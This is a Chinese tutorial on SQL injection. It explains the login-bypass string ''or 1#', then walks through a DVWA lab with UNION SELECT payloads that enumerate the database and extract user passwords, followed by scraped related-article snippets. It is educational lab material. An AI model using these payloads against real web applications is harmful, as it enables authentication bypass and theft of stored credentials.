SQL注入漏洞 攻击
SQL 注入漏洞
一.什么是注入漏洞
注入(SQLi)是一种注入攻击,可以执行恶意SQL语句。它通过将任意SQL代码插入数据库查询,使攻击者能够完全控制Web应用程序后面的数据库服务器。攻击者可以使用SQL注入漏洞绕过应用程序安全措施;可以绕过网页或Web应用程序的身份验证和授权,并检索整个SQL数据库的内容;还可以使用SQL注入来添加,修改和删除数据库中的记录。SQL注入漏洞可能会影响使用SQL数据库(如MySQL,Oracle,SQL Server或其他)的任何网站或Web应用程序。犯罪分子可能会利用它来未经授权访问用户的敏感数据:客户信息,个人数据,商业机密,知识产权等。SQL注入攻击是最古老,最流行,最危险的Web应用程序漏洞之一。
二.SQL注入漏洞的原理
一般用户登录用的SQL语句为:SELECT * FROM user WHERE username=‘admin’ AND password=‘passwd’,此处admin和passwd分别为用户输入的用户名和密码,如果程序员没有对用户输入的用户名和密码做处理,就可以构造万能密码成功绕过登录验证,如用户输入’or 1#,SQL语句将变为:SELECT * FROM user WHERE username=’‘or 1#’ AND password=’’,‘’or 1为TRUE,#注释掉后面的内容,所以查询语句可以正确执行。我们可以使用DVWA来测试一下。在原有sql语句中插入构造的语句,返回我们需要的数据
三.实验过程
1. 搭建环境
1. 重启php ,并打开登录信息
2. 下载dvwa
1. 下载放在WWW的目录下,并用记事本打开config 修改用户名和密码为root
2.打开小狐狸访问127.0.0.1/dvwa
把安全性设置成最低的——low
3. SQL注入点,简单判断方法。
1’ 、 " 、) 、 ')、 ") 是否报错
4. 1 and 1=1 1 and 1=2 判断返回是否有差异
5. 1 or 1=1 1 or 1=2 判断返回是否有差异
6. 判断可显示数据的位置
1’ union select 1,2 #
7. 判断数据库名、数据库版本、用户名
1’ union select version(),user() #
8. 获取表名
1’ union select 1,group_concat(table_name) from information_schema.tables where table_schema=‘dvwa’# (guestbook,users)
9. 获取列名
1’ union select 1, group_concat(column_name) from information_schema.columns where table_name=‘users’ and table_schema=database()#
10. 获取数据——成功
1’ union select user,password from users#
SQL注入漏洞 攻击相关推荐
- 【转】基于SQL的Web系统安全防范——SQL注入漏洞
攻击研究及防范措施 SQL-Based Web System Security--Structured Query Language InjectionLeak Attack Study And De ...
- sql注入漏洞,应屏蔽SQL注入攻击
2019独角兽企业重金招聘Python工程师标准>>> 注:SQL注入好比是前端URL传参数请求时参数以SQL 做为参数传入,如 select 1 from dual where ...
- SQL注入漏洞的攻击与防御
一.实验名称 SQL注入漏洞的攻击与防御 二.实验环境(详细说明运行的系统.平台及代码等) 1.攻击机系统环境:Windows 7/8/10 2.浏览器:Firefox 53.0.2(64位) 3.浏 ...
- SQL 注入漏洞(十四)xff 注入攻击
一.xff 注入攻击 X-Forwarded-For 简称 XFF 头,它代表了客户端的真实 IP,通过修改他的值就可以伪造客户端 IP.XFF 并不受 gpc 影响,而且开发 人员很容易忽略这个 X ...
- php post防止hash攻击,MyBB editpost.php脚本'posthash' 参数SQL注入漏洞
发布日期:2012-12-14 更新日期:2012-12-18 受影响系统: MyBB MyBB 1.x 描述: ------------------------------------------- ...
- guestbook.php注入,TinyGuestBook 'sign.php'多个SQL注入漏洞
发布日期:2012-09-23 更新日期:2012-10-04 受影响系统: TinyGuestBook TinyGuestBook 描述: ----------------------------- ...
- WEB安全:XSS漏洞与SQL注入漏洞介绍及解决方案
对web安全方面的知识非常薄弱,这篇文章把Xss跨站攻击和sql注入的相关知识整理了下,希望大家多多提意见. 对于防止sql注入发生,我只用过简单拼接字符串的注入及参数化查询,可以说没什么好经验,为避 ...
- wordpress漏洞_多个WordPress插件SQL注入漏洞分析
背景 SQL注入漏洞是用来构建SQL查询的用户输入未经适当处理导致的漏洞.比如: 图1: 使用WordPress的SQL查询示例 从上面的代码来看,其中存在SQL注入攻击漏洞,因为从$_GET中提取的 ...
- php网站漏洞检测对sql注入漏洞防护
近日,我们SINE安全对metinfo进行网站安全检测发现,metinfo米拓建站系统存在高危的sql注入漏洞,攻击者可以利用该漏洞对网站的代码进行sql注入攻击,伪造恶意的sql非法语句,对网站的数 ...
- Zabbix SQL注入漏洞威胁预警通告
Zabbix软件被爆存在SQL注入漏洞,攻击者无需登录即可通过script等功能直接获取服务器的操作系统权限,经过分析发现Zabbix默认开启了guest权限,且默认密码为空.为了帮助广大用户尽快关注 ...
最新文章
- pandas使用extract函数根据正则表达式从dataframe指定数据列的字符串中抽取出数字并生成新的数据列(extract numbers from column)
- linux入门(二)
- 5 hbase-shell + hbase的java api
- attr和prop的区别
- bootstrap兼容ie8以下版本
- erp生产管理系统排名_仁和ERP软件企业管理系统如何提高生产管理
- Tomcat的部署+第一个Servlet
- postgre ~模糊查询慢解决方式
- python随机抽奖程序代码_详解用python写一个抽奖程序
- Tomcat的设计模式
- mysql主从复制(master 、salve)
- 统信UOS安装flash浏览器插件
- AI笔刷 600+专业ai矢量笔刷套装(含安装教程)
- THREE实战2_正交投影相机与透视相机
- css 小尖角,css如何实现气泡的小尖角效果 css实现气泡的小尖角效果代码示例
- Gym 101669J SEERC 2017	Cunning Friends
- 2023年北京师范大学应用统计考研上岸前辈备考经验指导
- 起因:想要用visio画框图
- ArcGIS批量修改CASS标注 | 小技巧,高效率
- 基于微信小程序云开发(校园许愿墙app)妄想替代学校的表白墙